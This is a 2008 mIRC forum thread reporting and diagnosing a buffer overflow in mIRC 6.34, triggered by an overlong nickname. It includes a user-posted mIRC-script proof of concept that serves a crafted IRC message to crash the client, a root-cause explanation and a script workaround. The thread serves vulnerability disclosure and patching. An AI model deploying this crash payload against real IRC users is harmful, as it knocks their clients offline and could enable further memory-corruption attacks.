mIRC Home    About    Download    Register    News    Help

Print Thread
Joined: Oct 2008
Posts: 1
E
emm1 Offline OP
Mostly harmless
OP Offline
Mostly harmless
E
Joined: Oct 2008
Posts: 1
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.

http://www.milw0rm.com/exploits/6654

Joined: Dec 2002
Posts: 3,138
C
Hoopy frood
Offline
Hoopy frood
C
Joined: Dec 2002
Posts: 3,138
Confirmed, crashes a clean mIRC 6.34.

Joined: Dec 2002
Posts: 5,226
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 5,226
This is a server-based expoit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.

That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.

When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.

When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.

I'll continue to try to reproduce this issue and if verified I should have an update out shortly.

Joined: Jun 2008
Posts: 58
P
Babel fish
Offline
Babel fish
P
Joined: Jun 2008
Posts: 58
That Perl Script is crashing both my modified and my clean installation of mIRC.
Screenshot
Windows XP Service Pack 3, mIRC 6.34, ...

Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
Code:
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }

  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }

  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type 04/server localhost %p $+  to crash mirc.
}

on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}

Last edited by Pivo; 04/10/08 03:30 PM.
Joined: Oct 2008
Posts: 1
D
Mostly harmless
Offline
Mostly harmless
D
Joined: Oct 2008
Posts: 1

Joined: Apr 2004
Posts: 867
Sat Offline
Hoopy frood
Offline
Hoopy frood
Joined: Apr 2004
Posts: 867
The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.

Temporary workaround until the new mIRC is out:
Code:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt

Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.


Saturn, QuakeNet staff
Joined: Dec 2002
Posts: 5,226
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 5,226
Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.

Joined: Oct 2007
Posts: 51
T
Babel fish
Offline
Babel fish
T
Joined: Oct 2007
Posts: 51
Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.


Link Copied to Clipboard